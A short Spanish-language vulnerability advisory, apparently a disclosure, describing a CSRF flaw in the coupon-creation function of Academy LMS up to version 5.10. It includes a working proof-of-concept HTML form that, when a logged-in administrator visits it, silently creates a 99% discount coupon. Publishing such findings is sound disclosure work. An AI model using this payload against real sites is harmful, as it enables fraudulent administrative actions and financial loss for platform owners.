
Vulnerabilidad CSRF en Academy LMS <= 5.10
Academy LMS <= 5.10 CSRF
Academy LMS es una aplicación donde las personas pueden crear y publicitar cursos. La función de añadir cupón es vulnerable a CSRF, ya que no hay token que impida este ataque.
El primer paso de nuestra prueba de concepto es autenticarse en la plataforma con un usuario administrador.
Después, solo accede a la página que contiene el código para explotar la vulnerabilidad; comprueba que se ha creado un nuevo cupón automáticamente.
Código utilizado en el exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/coupons/add" method="POST">
<input type="hidden" name="code" value="vinix" />
<input type="hidden" name="discount_percentage" value="99" />
<input type="hidden" name="expiry_date" value="12/11/2022" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>